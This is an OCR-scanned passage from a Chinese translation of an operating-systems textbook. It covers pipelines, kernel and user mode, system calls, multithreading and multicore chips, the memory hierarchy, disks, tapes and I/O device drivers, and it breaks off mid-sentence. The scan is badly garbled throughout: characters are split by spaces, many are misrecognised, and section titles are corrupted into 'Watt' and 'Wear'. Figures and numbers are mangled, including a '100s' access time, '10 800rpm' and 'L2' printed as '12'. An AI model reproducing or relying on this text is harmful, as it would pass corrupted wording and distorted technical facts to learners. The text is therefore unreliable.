只 对 其 中 的 少量 字段 写 入 。 在 系统 调用 和 IO 中 ，PSW 的 作用 很 重 


So 


操作 系统 必须 知晓 所 有 的 寄存 器 。 在 时 间 多 路 复 用 (time 
multiplexing) CPU 中 ， 操 作 系 统 经 常会 中 止 正在 运行 的 茶 个 程序 并 局 动 
《或 再 启动 ) 另 一 个 程序 。 每 次 停止 一 个 运行 着 的 程序 时 ， 操 作 系统 必 














须 保 存 所 有 的 寄存 器 ， 这 样 在 稍 后 该 程序 被 再 次 运行 时 ， 可 以 把 这 些 寄 
存 器 重新 装 入 。 


为 了 改善 性 能 ，CPU 设 计 师 早 就 放弃 了 同时 读 取 、 解 码 和 执行 一 条 
引信 的 简单 模型 。 许 多 现代 CPU 具有 同时 取出 多 条 指令 的 机 制 。 例 如 ， 
一 个 CPU 可 以 有 分 开 的 取 指 单元 、 解 码 单 元 和 执行 单元 ， 于 是 当 它 执行 
指令 n 时 ， 它 还 可 以 对 指令 n+1 解 码 ， 并 且 读 取 指 令 n+2。 这 样 一 种 机 制 
称 为 流水 线 〈pipeline) ， 在 图 1-7a 中 是 一 个 有 痢 三 个 阶段 的 流水 线 示意 
图 。 更 长 的 流水 线 也 是 常见 的 。 在 多 数 的 流水 线 设计 中 ， 一 旦 一 条 指令 
被 取 进 流水 线 中 ， 它 就 必须 被 执行 完毕 ， 即 便 前 一 条 取出 的 指令 是 条 件 
转移 ， 它 也 必须 被 执 行 完 毕 。 流 水 线 使 得 编译 器 和 操作 系统 的 编写 者 很 
头疼 ， 因 为 它 造 成 了 在 机 口中 实现 这 些 软件 的 复杂 性 问题 。 














a) 


图 1-7 约 有 三 个 阶段 的 流水 线 ; b) 一 个 超标 量 CPU 
比 流水 线 更 先进 的 设计 是 一 种 超标 量 CPU， 如 图 1-7b 所 示 。 在 这 种 


设计 中 ， 有 多 个 执行 单元 ， 例 如 ， 一 个 CPU 用 于 整数 算术 运算 ， 一 个 
CPU 用 于 浮 点 算术 运算 ， 而 为 一 个 用 于 布尔 运算 。 两 个 或 更 多 的 指令 被 





同时 取出 、 解 码 并 装 入 一 个 保持 缓冲 区 中 ， 直 至 它们 执行 完毕 。 只 要 有 
一 个 执行 单元 空 几 ， 束 检查 保持 缓冲 区 中 是 否 还 有 可 处 理 的 指令 ， 如 果 
有 ， 束 把 指令 从 缓冲 区 中 移出 并 执行 之 。 这 种 设计 存在 一 种 隐 含 的 作 
用 ， 即 程序 的 指令 经 各 不 按 顺 序 执行 。 在 多 数 情况 下 ， 硬 件 负 责 保证 这 
种 运算 的 结果 与 顺序 执行 指令 时 的 结果 相同 ， 但 是 ， 仍 然 有 部 分 令 人 烦 
恼 的 复杂 情形 被 强加 给 操作 系统 处 理 ， 我 们 在 后 面 会 讨论 这 种 情况 。 








除了 用 在 仍 入 式 系 统 中 的 非 币 简单 的 CPU 之 外 ， 多 数 CPU 都 有 两 种 
模式 ， 即 前 面 已 经 提 及 的 内 核 态 和 用 户 态 。 通 解 ， 在 PSW 中 有 一 个 二 进 
制 位 控制 这 两 种 模式 。 当 在 内 核 态 运行 时 ，CPU 可 以 执行 指令 集中 的 每 
一 条 指令 ， 并 且 使 用 硬件 的 每 种 功能 。 操 作 系 统 在 内 核 态 下 运行 ， 从 而 
可 以 访问 整个 硬件 。 








相反 ， 用 户 程 序 在 用 户 态 下 运行 ， 仪 允许 执行 整个 指令 集 的 一 个 子 
集 和 访问 所 有 功能 的 一 个 子 集 。 一 般 而 言 ， 在 用 户 态 中 有 关 IO 和 和 内存 
保护 的 所 有 指令 是 茶 止 的 。 当 然 ， 将 PSW 中 的 模式 位 设置 成 内 核 态 也 是 
禁止 的 。 








为 了 从 操作 系统 中 获得 服务 ， 用 户 程 友 必 须 使 用 系统 调用 (system 
call) 系统 调用 陷入 内 核 并 调用 操作 系统 。TRAP 指 令 把 用 户 态 切换 成 内 
核 态 ， 并 启用 操作 系统 。 当 有 关 工 作 完 成 之 后 ， 在 系统 调用 后 面 的 指令 
把 控制 权 返 回 给 用 户 程序 。 在 本 半 的 后 面 我 们 将 具体 解释 系统 调用 过 


程 ， 但 是 在 这 里 ， 请 读者 把 它 看 成 是 一 个 特别 的 过 程 调 用 指令 ， 该 指令 











具有 从 用 户 态 切换 到 内 核 态 的 特别 能 力 。 作 为 排 印 上 的 说 明 ， 我 们 在 行 
文中 使 用 小 写 的 Helvetica 字 体 ， 表 示 系 统 调 用 ， 比 如 read。 


有 必要 指出 ， 计 算 机 使 用 陷阱 而 不 是 一 条 指令 来 执行 系统 调用 。 其 
他 的 多 数 陷阱 是 由 硬件 引起 的 ， 用 于 警告 有 寞 和 党 情况 发 生 ， 诸 如 试图 被 
零 除 或 浮 点 下 洲 等 。 在 所 有 的 情况 下 ， 操 作 系统 都 得 到 控制 权 并 决定 如 
何 处 理 异 常情 况 。 有 时 ， 由 于 出 错 的 原因 程序 不 得 不 停止 。 在 其 他 情况 
下 可 以 忽略 出 错 〈 如 下 湾 数 可 以 被 置 为 零 ) 。 最 后 ， 大 程序 已 经 提前 宣 
布 它 硕 望 处 理 茶 类 条 件 时 ， 那 么 控制 权 还 必须 返回 给 该 程序 ， 让 其 处 理 
相关 的 问题 。 





多 线程 和 多 核 芯片 


Moore 定 律 指出 ， 心 片 中 晶体 管 的 数量 每 18 个 月 翻 一 看 。 这 个 “ 定 
律 * 并 不 是 物理 学 上 的 某 种 规律 ， 诸 如 动量 守恒 定律 等 ， 它 是 Intel 公 司 
的 共同 创始 人 Gordon Moore 对 半导体 公司 如 何 能 快速 缩小 晶体 管 能 力 上 
的 一 个 观察 结 采 。Moore 定 律己 经 保持 了 30 年 ， 有 和 希望 至 少 再 保持 10 
年 。 











使 用 大 量 的 晶体 管 引 发 了 一 个 问题 : 如 何 处 理 它 们 呢 ? 这 里 我 们 可 
以 看 到 一 种 处 理 方 式 : 具有 多 个 功能 部 件 的 超标 量 体 系 结构 。 但 是 ， 随 
着 唱 体 管 数量 的 增加 ， 再 多 唱 体 管 也 是 可 能 的 。 一 件 由 此 而 来 的 必然 结 
果 和 是， 在 CPU 心 片 中 加 入 了 更 大 的 缓存 ， 人 们 肯定 会 这 样 做 ， 然 而 ， 原 








先 获得 的 有 用 效果 将 最 终 消失 挥 。 





显然 ， 下 一 步 不 仅 是 有 多 个 功能 部 件 ， 某 些 控 制 逻辑 也 会 出 现 多 
个 。Pentium 4 和 其 他 一 些 CPU 芯片 就 是 这 样 做 的 ， 称 为 多 线程 
(multithreading) 或 超 线程 (hyperthreading， 这 是 Intel] 公 司 给 出 的 名 
BK) 。 近 似 地 说 ， 多 线程 允许 CPU 保 持 两 个 不 同 的 线程 状态 ， 然 后 在 纳 
秒 级 的 时 间 尺 度 内 来 回 切 换 。 线程 是 一 种 轻 量 级 进程 ， 也 即 一 个 运行 
中 的 程序 。 我 们 将 在 第 2 章 中 具体 讨论 ) 。 例 如 ， 如 果 某 个 进程 需要 从 
内 存 中 读 出 一 个 字 〈 需 要 花费 多 个 时 钟 周期 ) ， 多 线程 CPU 则 可 以 切换 
至 另 一 个 线程 。 多 线程 不 提供 真正 的 并 行 处 理 。 在 一 个 时 刻 只 有 一 个 进 
程 在 运行 ， 但 是 线程 的 切换 时 间 则 减少 到 纳 秒 数量 级 。 














多 线程 对 操作 系统 而 言 是 有 意义 的 ， 因 为 每 个 线程 在 操作 系统 看 来 
就 像 是 单个 的 CPU。 考 虑 一 个 实际 有 两 个 CPU 的 系统 ， 每 个 CPU 有 两 个 
线程 。 这 样 操 作 系统 将 把 它 看 成 是 4 个 CPU。 如 果 在 某 个 时 间 的 特定 点 
上 ， 只 有 能 够 维持 两 个 CPU 忙碌 的 工作 量 ， 那 么 在 同一 个 CPU 上 调度 两 
个 线程 ， 而 让 另 一 个 CPU 完全 空转 ， 就 没有 优势 了 。 这 种 选择 远 远 不 如 
在 每 个 CPU 上 运行 一 个 线程 的 效率 高 。Pentium 4 的 后 继 者 ，Core〈 还 有 
Core 2) 的 体系 结构 并 不 支持 超 线程 ， 但 是 Intel 公 司 已 经 宣布 ，Core 的 
后 继 者 会 具有 超 线程 能 











除了 多 线程 ， 还 出 现 了 包含 2 个 或 4 个 完整 处 理 占 或 内 核 的 CPU 心 
请 。 图 1-8 中 的 多 核心 片上 有 效 地 装 有 4 个 小 心 片 ， 每 个 小 坊 片 都 是 一 个 





独立 的 CPU。【〔 后 面 将 解释 缓存 。〉 要 使 用 这 类 多 核心 片 肯 定 需 要 多 处 
理 嚣 操作 系统 。 





图 1-8 个 带 有 共享 12 缓存 的 4 核 芯 片 ; D 带 有 分 离 L2 缓 存 的 4 核 芯 片 


1.3.2 存储 器 





在 任何 一 种 计算 机 中 的 第 二 种 主要 部 件 都 是 存储 器 。 在 理想 情形 
下 ， 存 储 器 应 该 极为 迅速 〈 快 于 执行 一 条 指令 ， 这 样 CPU 不 会 受到 存储 
恬 的 限制 )， 充 分 大 ， 并 且 非 常 便宜 。 但 是 目前 的 技术 无 法 同时 满足 这 
三 个 目标 ， 于 是 出 现 了 不 同 的 处 理 方式 。 存 储 器 系统 采用 一 种 分 层次 的 
结构 ， 如 图 1-9 所 示 。 顶 层 的 存储 器 速度 较 高 ， 容 量 较 小 ， 与 压 层 的 存 
储 强 相 比 每 位 成 本 较 品 ， 其 差别 往往 是 十 亿 数 量 级 。 





















典型 的 访问 时 间 典型 的 容量 
lns <1 KB 
2ns 高 速 缓存 4 MB 
10ns ff 512~2048 MB 
10ms 200~1000 GB 
100s 400~800 GB 


图 1-9 典型 的 存储 层次 结构 ， 图 中 的 数据 是 非常 粗略 的 估计 


存储 器 系统 的 顶层 是 CPU 中 的 寄存 器 。 它 们 用 与 CPU 相 同 的 材料 制 
成 ， 所 以 和 CPU 一 样 快 。 显然， 访问 它们 是 没有 时 延 的 。 其 典型 的 存储 
容量 是 ， 在 32 位 CPU 中 为 32x32 位 ， 而 在 64 位 CPU 中 为 64x64 位 。 在 这 两 
种 情形 下 ， 其 存储 容量 都 小 于 1 KB。 程 序 必须 在 软件 中 自行 管理 这 些 寄 
存 器 《〈《 即 决定 如 何 使 用 它们 ) 。 














下 一 层 是 高 速 缓存 ， 它 多 数 由 硬件 控制 。 主 存 被 分 割 成 高 速 缓存 行 
(cache line) ， 其 典型 大 小 为 64 个 字 节 ， 地 址 0 至 63 对 应 高 速 缓存 行 0， 
地 址 64 至 127 对 应 高 速 缓存 行 1， 以 此 类 推 。 最 常用 的 高 速 缓存 行 放置 在 
CPU 内 部 或 者 非常 接近 CPU 的 高 速 缓存 中 。 当 某 个 程序 需要 读 一 个 存储 
字 时 ， 高 速 缓存 硬件 检查 所 需要 的 高 速 缓存 行 是 否 在 高 速 缓存 中 。 如 果 
是 ， 称 为 高 速 缓存 命中 ， 缓 存 满 足 了 请 求 ， 就 不 需要 通过 总 线 把 访问 请 
求 送 往 主 存 。 高 速 缓存 命中 通常 需要 两 个 时 钟 周 期 。 高 速 缓存 未 命中 就 
必须 访问 内 存 ， 这 要 付出 大 量 的 时 间 代 价 。 由 于 高 速 缓存 的 价格 昂贵 ， 
所 以 其 大 小 有 限 。 有 些 机 器 具有 两 级 甚至 三 级 高 速 绥 存 ， 每 一 级 高 速 绥 
存 比 前 一 级 慢 且 容量 更 大 。 















































绥 存 在 计算 机 科学 的 许多 领域 中 起 着 重要 的 作用 ， 并 不 仅仅 只 是 
RAM 的 缓存 行 。 只 要 存在 大 量 的 资源 可 以 划分 为 小 的 部 分 ， 那 么 ， 这 
些 资源 中 的 茶 些 部 分 就 会 比 其 他 部 分 更 频繁 地 得 到 使 用 ， 通 和 缓 存 的 使 
用 会 带 来 性 能 上 的 改善 。 操 作 系 统一 直 在 使 用 缓存 。 例 如 ， 多 数 操作 系 
统 在 内 存 中 保留 频繁 使 用 的 文件 〈 的 一 部 分 ) ， 以 避免 从 磁盘 中 重复 地 
调 取 这 些 文件 。 相 似 地 ， 类 似 于 





/home/ast/projects/minix3/src/kernel/clock.c 








的 长 路 径 名 转换 成 文件 所 在 的 磁盘 地 址 的 结果 ， 也 可 以 放 入 绥 存 ， 
以 避免 重复 寻找 地 址 。 还 有 ， 当 一 个 Web 页 面 (URL) 的 地 址 转换 为 网 


络 地 址 (IP 地 址 》 后 ， 这 个 转换 结果 也 可 以 缓存 起 来 以 供 将 来 使 用 。 还 
有 许多 其 他 的 类 似 的 应 用 。 


在 任何 缓存 系统 中 ， 都 有 在 干 需要 尽快 考虑 的 问题 ， 包 括 : 


1) 何 时 把 一 个 新 的 内 容 放 入 缓存 。 





2) 把 新 内 容 放 在 缓存 的 哪 一 行 上 。 


3) 在 需要 时 ， 应 该 把 哪个 内 容 从 缓存 中 移 走 。 








4) 应 该 把 新 移 走 的 内 容 放 在 茶 个 较 大 存储 圳 的 何 处 。 


并 不 是 每 个 问题 的 解决 方案 都 符合 每 种 缓存 处 理 。 对 于 CPU 缓存 中 
的 主 存 缓存 行 ， 每 当 有 缓存 未 命中 时 ， 就 会 调 入 新 的 内 容 。 通 常 通 过 所 
引用 内 存 地 址 的 高 位 计算 应 该 使 用 的 缓存 行 。 例 如 ， 对 于 64 字 节 的 4096 
缓存 行 ， 以 及 32 位 地 址 ， 其 中 6 一 17 位 用 来 定位 缓存 行 ， 而 0 一 5 位 则 用 
来 确定 缓存 行 中 的 字 节 。 在 这 个 例子 中 ， 被 移 走 内 容 的 位 置 就 是 新 数据 
要 进入 的 位 置 ， 但 是 在 有 的 系统 中 未 必 是 这 样 。 最 后 ， 当 将 一 个 缓存 行 
的 内 容重 写 进 主 存 时 《该 内 容 被 缓存 后 ， 可 能 会 被 修改 ) ， 通 过 该 地 址 
来 惟一 确定 需 重 写 的 主 存 位 置 。 




















缓存 是 一 种 好 方法 ， 所 以 现代 CPU 中 设计 了 两 个 缓 在。 第 一 级 或 称 
为 L1 绥 存 总 是 在 CPU 中 ， 通 币 用 来 将 已 解码 的 指令 调 入 CPU 的 执行 引 
擎 。 对 于 那些 频 索 使 用 的 数据 字 ， 多 数 忆 片 安排 有 第 二 个 L1 缓 企 。 典 型 


的 L1 绥 存 大 小 为 16KB。 另 外 ， 往 往 还 设计 有 二 级 缓存 ， 称 为 2 缓存 ， 
用 来 存放 近来 所 使 用 过 知 干 兆 字 节 的 内 存 字 。L1 和 L2 缓 存 之 间 的 差别 
在 于 时 序 。 对 L1 绥 存 的 访问 ， 不 存在 任何 延 时 ;而 对 L2 缓 存 的 访问 ， 
则 会 延 时 1 或 2 个 时 钟 周 期 。 


在 多 核 蕊 片 中 。 设 计 师 必须 确定 缓存 的 位 置 。 在 图 1-8a 中 ， 一 个 L2 
绥 人 存 被 所 有 的 核 共 孚 。Intel 多 核 必 片 采用 了 这 个 方法 。 相 反 ， 在 图 1-8b 
中 ， 每 个 核 有 其 自己 的 L2 缓 存 。AMD 采 用 这 个 方法 。 不 过 每 种 策略 都 
有 目 己 的 优 缺 点 。 例 如 ，Intel 的 共 孚 2 缓存 需要 有 一 种 更 复 杀 的 缓存 控 
制 基 ， 而 AMD 的 方式 在 设法 保持 L2 绥 存 一 致 性 上 存在 困难 。 











在 图 1-9 的 层次 结构 中 ， 再 往 下 一 层 是 主 存 。 这 是 存储 器 系统 的 主 
力 。 主 存 通常 称 为 随机 访问 存储 器 (Random Access Memory; 
RAM) 。 过 去 有 时 称 之 为 磁 忆 存储 器 ， 因 为 在 20 世 纪 50 年 代 和 60 年 
代 ， 使 用 很 小 的 可 磁化 的 铁 磁体 制作 主 存 。 目 前 ， 存 储 器 的 容量 在 几 百 
兆 字 节 到 若干 吉 字 节 之 间 ， 并 且 其 容量 正在 迅速 增长 。 所 有 不 能 在 高 速 
缓存 中 得 到 满足 的 访问 请 求 都 会 转 往 主 存 。 














除了 主 存 之 外 ， 许 多 计算 机 已 经 在 使 用 少量 的 非 易 失 性 随机 访问 存 
储 器 。 它 们 与 RAM 不 同 ， 在 电源 切断 之 后 ， 非 易 失 性 随机 访问 存储 器 
并 不 丢失 其 内 容 。 只 读 存 储 器 (Read Only Memory, ROM) 在 工厂 中 
就 被 编程 完毕 ， 然 后 再 也 不 能 被 修改 。ROM 速 度 快 且 便 宜 。 在 有 些 计 
算 机 中 ， 用 于 局 动 计算 机 的 引导 加 载 模块 就 存放 在 ROM 中 。 另 外， 一 


些 IO 卡 也 采用 ROM 处 理 底 层 设 备 控制 。 


EEPROM (Electrically Erasable PROM， 电 可 擦 除 可 编程 ROM) 和 
闪存 (flash memory〉 也 是 非 易 失 性 的 ， 但 是 与 ROM 相 反 ， 它 们 可 以 探 
除 和 重 写 。 不 过 重 写 它们 需要 比 写 入 RAM 更 高 数量 级 的 时 间 ， 所 以 它 
们 的 使 用 方式 与 ROM 相 同 ， 而 其 与 众人 不同 的 特点 使 它们 有 可 能 通过 字 
段 重 写 的 方式 纠正 所 保存 程序 中 的 错误 。 














在 便携 式 电 子 设备 中 ， 闪 存 通 闸 作 为 存储 媒介 。 闪 存 是 数码 相机 中 
的 胶卷 ， 是 便携 式 音乐 播放 霹 的 磁盘 ， 这 仅仅 是 内 存 用 途中 的 两 项 。 内 
存在 速度 上 介 于 RAM 和 磁盘 之 间 。 另 外 ， 与 磁盘 存储 器 不 同 ， 如 果 内 
存 欣 除 的 次 数 过 多 ， 束 被 磨损 了 。 


还 有 一 类 存储 器 是 CMOS， 它 是 易 失 性 的 。 许 多 计算 机 利用 CMOS 
存储 器 保持 当前 时 间 和 日 期 。 CMOS 存 储 器 和 递增 时 间 的 时 钟 电路 由 一 
块 小 电池 驱动 ， 所 以 ， 即 使 计算 机 没有 上 电 ， 时 间 也 仍然 可 以 正确 地 更 
新 。CMOS 存 储 器 还 可 以 保存 配置 参数 ， 诸 如 ， 哪 一 个 是 启动 磁盘 等 。 
之 所 以 采用 CMOS 是 因为 它 消耗 的 电能 非常 少 ， 一 块 工 三 原装 的 电池 往 
往 就 能 使 用 若干 年 。 但 是 ， 当 电池 开始 失效 时 ， 计 算 机 就 会 出 
现 *Alzheimer 病 症 ” U 计算 机 会 忘记 掉 记 忆 多 年 的 事物 ， 比 如 应 该 由 哪 


个 磁盘 局 动 等 。 








站 “一 种 病因 未 明 的 原 发 退行 性 大 脑 疾 病 ， 以 记忆 受 损 为 主要 特征 ， 是 


老年 性 痢 采 中 最 常见 的 一 种 类 型 。 





译 者 注 


1.3.3 Watt 


下 一 个 层次 是 磁盘 《硬盘 ) 。 磁 盘 同 RAM 相 比 ， 每 个 二 进 制 位 的 
成 本 低 了 两 个 数量 级 ， 而 且 经 音 也 有 两 个 数量 级 大 的 容量 。 磁 盘 惟 一 的 
问题 是 随机 访问 数据 时 间 大 约 慢 了 三 个 数量 级 。 其 低速 的 原因 是 因为 磁 
盘 是 一 种 机 械 装置 ， 如 图 1-10 所 示 。 
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图 1-10 磁盘 驱动 器 的 构造 





在 一 个 磁盘 中 有 一 个 或 多 个 金属 盘 片 ， 它 们 以 5400，7200 或 10 
800rpm 的 速度 旋转 。 从 边缘 开始 有 一 个 机 械 臂 悬 横 在 盘面 上 ， 这 类 似 于 
老式 播放 塑料 唱片 33 转 唱机 上 的 拾 音 臂 。 信 息 写 在 磁盘 上 的 一 系列 同心 


圆 上 。 在 任意 一 个 给 定 臂 的 位 置 ， 每 个 磁头 可 以 读 取 一 段 环形 区 域 ， 称 
HBE (track) 。 把 一 个 给 定 辟 的 位 置 上 的 所 有 磁道 合并 起 来 ， 组 成 了 
一 个 柱 面 (cylinder) 。 





每 个 磁道 划分 为 各 干 面 区， 局 区 的 典型 值 是 512 字 节 。 在 现代 磁盘 
中 ， 较 外 面 的 柱 面 比较 内 部 的 柱 面 有 更 多 的 局 区 。 机 械 辟 从 一 个 柱 面 移 
到 相 邻 的 柱 面 大 约 需 要 lms。 而 随机 移 到 一 个 柱 面 的 典型 时 间 为 5ms 人 至 
10ms， 其 具体 时 间 取 决 于 驱动 器 。 一 旦 磁 句 到达 正 确 的 磁道 上 ， 了 驱动 器 
必须 等 竺 所 需 的 面 区 旋转 到 磁头 之 下 ， 这 区 增加 了 5ms 全 10ms 的 时 延 ， 
其 具体 延 时 取决 于 驱动 器 的 转速 。 一 旦 所 需要 的 扇 区 移 到 磁头 之 下 ， 就 
开始 读 写 ， 低 端 硬盘 的 速率 是 5MB/s， 而 高 速 磁盘 的 速率 是 160 MB/s. 











许多 计算 机 支持 一 种 着 名 的 虚拟 内 存 机 制 ， 这 将 在 第 3 章 中 讨论 。 
这 种 机 制 使 得 期 望 运 行 大 于 物理 内 存 的 程序 成 为 可 能 ， 其 方法 是 将 程序 
放 在 磁盘 上 ， 而 将 主 存 作为 一 种 缓存 ， 用 来 保存 最 频繁 使 用 的 部 分 程 
序 。 这 种 机 制 需 要 快速 地 映像 内 存 地 址 ， 以 便 把 程序 生成 的 地 址 转换 为 
有 关 字 节 在 RAM 中 的 物理 地 址 。 这 种 映像 由 CPU 中 的 一 个 部 件 ， 称 为 
存储 器 管理 单元 (Memory Management Unit, MMU) 来 完成 ， 如 图 1-6 
所 示 。 





绥 存 和 MMU 的 出 现 对 系统 的 性 能 有 着重 要 的 影响 。 在 多 道 程 序 系 
统 中 ， 从 一 个 程序 切换 到 另 一 个 程序 ， 有 时 称 为 上 下 文 切换 (context 
switch) ， 有 必要 对 缓存 中 来 的 所 有 修改 过 的 块 进 行 号 回 磁盘 操作 ， 并 





修改 MMU 中 的 映像 寄存 器 。 但 是 这 两 种 操作 的 代价 很 郧 贵 ， 所 以 程序 
员 们 努力 避免 使 用 这 些 操作 。 我 们 稍 后 将 看 到 这 些 操作 产生 的 影 啊 。 


1.3.4 Wear 








在 存储 器 体系 中 的 最 后 一 层 是 磁带 。 这 种 介质 经 名 用 于 磁盘 的 备 
份 ， 并 且 可 以 保存 非常 大 量 的 数据 集 。 在 访问 磁带 前 ， 首 先 要 把 磁带 装 
到 磁带 机 上 ， 可 以 人 工 安装 也 可 用 机 器 人 安装 〈 在 大 型 数据 库 中 通 癌 安 
装 有 上 自动 磁带 处 理 设备 ) 。 然 后 ， 磁 市 可 能 还 需要 癌 前 绕 转 以 便 读 取 所 
请 求 的 数据 块 。 总之， 这 一 切 工 作 要 花费 几 分 钟 。 人 磁带 的 最 大 特点 是 每 
个 二 进 制 位 的 成 本 极其 便宜 ， 并 且 是 可 移动 的 ， 这 对 于 为 了 能 在 火灾 、 
潜水、 地震 等 灾害 中 存活 下 来 ， 必 须 离线 存储 的 备份 磁 囊 而 言 ， 是 非常 
重要 的 。 














我 们 已 经 讨论 过 的 存储 需 体 系 结构 是 典型 的 ， 但 是 有 的 安装 系统 并 
不 具备 所 有 这 些 层次 ， 或 者 有 所 差别 (诸如 光盘 〉 。 不 过 ， 在 所 有 的 系 
统 中 ， 当 层次 下 降 时 ， 其 随机 访问 时 间 则 明显 地 增加 ， 容 量 也 同样 明显 
地 增加 ， 而 每 个 二 进 制 位 的 成 本 则 大 幅度 下 降 。 其 结果 是 ， 这 种 存储 器 
体系 结构 似乎 还 要 伴随 我 们 多 年 。 











1.3.5 IO 设备 


CPU 和 存储 器 不 是 操作 系统 惟一 需要 管理 的 资源 。IO 设 备 也 与 操 
作 系 统 有 密切 的 相互 影响 。 如 图 1-6 所 示 ，LIO 设 备 一 般 包 括 两 个 部 分 : 
设备 控制 器 和 设备 本 身 。 控 制 器 是 插 在 电路 板 上 的 一 块 芯 片 或 一 组 芯 
片 ， 这 块 电 路 板 物 理 地 控制 设备 。 它 从 操作 系统 接收 命令 ， 例 如 ， 从 设 
备 读 数据 ， 并 且 完 成 数据 的 处 理 。 





在 许多 情形 下 ， 对 这 些 设备 的 控制 是 非常 复杂 和 具体 的 ， 所 以 ， 控 
制 故 的 任务 是 为 操作 系统 提供 一 个 简单 的 接口 〈 不 过 还 是 很 复杂 的 ) 。 
例如 ,磁盘 控制 器 可 以 接受 一 个 命令 从 磁盘 2 读 出 11206 写 山区 ， 然 后 ， 
控制 器 把 这 个 线性 而 区 号 转化 为 柱 面 、 届 区 和 磁头 。 由 于 外 柱 面 比 内 柱 
面 有 较 多 的 鹿 区 ， 而 且 一 些 坏 扇 区 已 经 被 映射 到 磁盘 的 其 他 地 方 ， 所 以 
这 种 转换 将 是 很 复杂 的 。 磁 盘 控 制 器 必须 确定 磁头 臂 应 该 在 哪个 柱 面 
上 ， 并 对 磁头 各 发 出 一 串 脉 冲 使 其 前 后 移动 到 所 要 求 的 柱 面 号 上 ， 接 着 
必须 等 待 对 应 的 而 区 转动 到 磁头 下 面 并 开始 读 出 数据 ， 随 着 数据 从 驱动 
器 读 出 ， 要 消去 引导 块 并 计算 校 验 和 。 最 后 ， 还 得 把 输入 的 二 进 制 位 组 
成 字 并 存放 到 存储 器 中 。 为 了 要 完成 这 些 工作 ， 在 控制 器 中 经 第 安装 一 
个 小 的 啼 入 式 计算 机 ， 该 租 入 式 计算 机 运行 为 执行 这 些 工作 而 专门 编 好 
的 程序 。 








IO 设备 的 另 一 个 部 分 是 实际 设备 的 自身 。 设 备 本 身 有 个 相对 简单 
的 接口 ， 这 是 因为 接口 既 不 能 做 很 多 工作 ， 又 已 经 被 标准 化 了 。 标 准 化 
是 有 必要 的 ， 这 样 任何 一 个 IDE 磁 盘 控 制 器 就 可 以 适应 任 一 种 IDE 磁 
盘 ， 例 如 ，IDE 表 示 集 成 驱动 器 电子 设备 〈Integrated Drive 
Electronics) ， 是 许多 计算 机 的 磁盘 标准 。 由 于 实际 的 设备 接口 隐藏 在 
控制 器 中 ， 所 以 ， 操 作 系统 看 到 的 是 对 控制 器 的 接口 ， 这 个 接口 可 能 和 
设备 接口 有 很 大 的 差别 。 


每 类 设备 控制 器 都 是 不 同 的 ， 所 以 ， 需 要 不 同 的 软件 进行 控制 。 专 
门 与 控制 器 对 话 ， 发 出 命令 并 接收 啊 应 的 软件 ， 称 为 设备 驱动 程序 
(device driver) 。 每 个 控制 器 三 家 必须 为 所 支持 的 操作 系统 提供 相应 
的 设备 驱动 程序 。 例 如 ， 一 台 扫 摘 仪 会 配 有 用 于 Windows 2000, 
Windows XP、Vista 以 及 Linux 的 设备 驱动 程序 。 


为 了 能 够 使 用 设备 驱动 程序 ， 必 须 把 设备 驱动 程序 站 入 到 操作 系统 
中 ， 这 样 它 可 在 核心 态 中 运行 。 理 论 上 ， 设 备 驱 动 程序 可 以 在 内 核 外 运 
行 ， 但 是 几乎 没有 系统 支持 这 种 可 能 的 方式 ， 因 为 它 要 求 允 许 在 用 户 空 
闻 的 设备 驱动 程序 能 够 以 控制 的 方式 访问 设备 ， 这 是 一 种 极 少 得 到 文 持 
的 功能 。 要 将 设备 驱动 程序 逆 入 操作 系统 ， 有 三 个 途径 。 第 一 个 途径 是 
将 内 核 与 设备 驱动 程序 重新 链接 ， 然 后 重启 动 系统 。 许 多 UNIX 系 统 以 
这 种 方式 工作 。 第 二 个 途径 是 在 一 个 操作 系统 文件 中 设置 一 个 入 口 ， 并 
通知 该 文件 需要 一 个 设备 驱动 程序 ， 然 后 重启 动 系统 。 在 系统 月 动 时 ， 











操作 系统 去 找寻 所 需 的 设备 驱动 程序 并 装载 之 。Windows 就 是 以 这 种 方 
式 工作 。 第 三 种 途径 是 ， 操 作 系 统 能 够 在 运行 时 接受 新 的 设备 驱动 程序 
并 且 立 即将 其 安装 好 ， 无 须 重 启动 系统 。 这 种 方式 采用 的 较 少 ， 但 是 这 
种 方式 正在 变 得 普及 起 来 。 热 插 拔 设备 ， 诸 如 USB 和 IEEE1394 设 备 《〈 后 
面 会 讨论 ) 都 需要 动态 可 装载 设备 驱动 程序 。 





每 个 设备 控制 器 都 有 少量 的 用 于 通信 的 寄存 器 。 例 如 ， 一 个 最 小 的 
人 磁盘 控制 器 也 会 有 用 于 指定 磁盘 地 址 、 内 存 地 址 、 户 区 计数 和 方向 〈 读 
或 写 ) 的 寄存 器 。 要 激活 控制 器， 设备 驱动 程序 从 操作 系统 获得 一 条 命 
令 ， 然 后 翻译 成 对 应 的 值 ， 并 写 进 设备 寄存 器 中 。 所 有 设备 寄存 器 的 集 
合 构 成 了 IO 端口 空间 ， 我 们 将 在 第 5 章 讨 论 有 关内 容 。 





在 有 些 计算 机 中 ， 设 备 寄存 器 被 映射 到 操作 系统 的 地 址 空间 《操作 
系统 可 使 用 的 地 址 ) ， 这 样 ， 它 们 就 可 以 像 普通 存储 字 一 样 读 出 和 写 
入 。 在 这 种 计算 机 中 ， 不 需要 专门 的 W/O 指令 ， 用 户 程 序 可 以 被 硬件 阻 
挡 在 外 ， 防 止 其 接触 这 些 存储 器 地 址 例如， 采用 基 址 和 界限 寄存 
fit) 。 在 男 外 一 些 计 算 机 中 ， 设 备 寄存 器 被 放 入 一 个 专门 的 VO 站 口 空 
间 中 ， 每 个 寄存 器 都 有 一 个 端口 地 址 。 在 这 些 机 器 中 ， 提 供 在 内 核 态 中 
可 使 用 的 专门 IN 和 OUT 指 令 ， 供 设备 驱动 程序 读 写 这 些 寄存 器 用 。 前 一 
种 方式 不 需要 专门 的 VO 指令 ， 但 是 占用 了 一 些 地 址 空间 。 后 者 不 占用 
地 址 空间 ， 但 是 需要 专门 的 指令 。 这 两 种 方式 的 应 用 都 很 广泛 。 


实现 输入 和 输出 的 方式 有 三 种 。 在 最 简单 的 方式 中 ， 用 户 程 序 友 出 


一 个 系统 调用 ， 内 核 将 其 翻译 成 一 个 对 应 设备 驱动 程序 的 过 程 调用 。 然 
后 设备 驱动 程序 启动 VO 并 在 一 个 连续 不 断 的 循环 中 检查 该 设备 ， 看 该 
设备 是 否 完成 了 工作 (一 般 有 一 些 二 进 制 位 用 来 指示 设备 仍 在 忙碌 
H) 。 当 IO 结束 后 ， 设 备 驱 动 程序 把 数据 送 到 指定 的 地 方 〈 知 有 此 需 
